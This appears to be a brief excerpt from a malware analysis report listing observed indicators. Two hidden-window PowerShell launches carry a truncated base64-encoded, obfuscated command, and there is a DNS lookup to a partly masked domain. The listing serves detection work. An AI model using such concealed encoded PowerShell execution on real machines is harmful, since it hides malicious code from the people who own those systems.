Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e KAAoACIAewA3ADkAfQB7ADYANwB9AHsAOAAyAH0AewA0ADMAfQB7ADcANwB9AHsANwAwAH0AewA1ADIAfQB7ADQAfQB7ADEAMQB9AHsAOAB9AHsANgA1AH0AewA3ADYAfQB7ADIAMQB9AHsAMQAyAH0AewA1ADkAfQB7ADcAMw...
- DNS ASK g9###w8dqw.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e KAAoACIAewA3ADkAfQB7ADYANwB9AHsAOAAyAH0AewA0ADMAfQB7ADcANwB9AHsANwAwAH0AewA1ADIAfQB7ADQAfQB7ADEAMQB9AHsAOAB9AHsANgA1AH0AewA3ADYAfQB7ADIAMQB9AHsAMQAyAH0AewA1ADkAfQB7ADcAMw...' (with hidden window)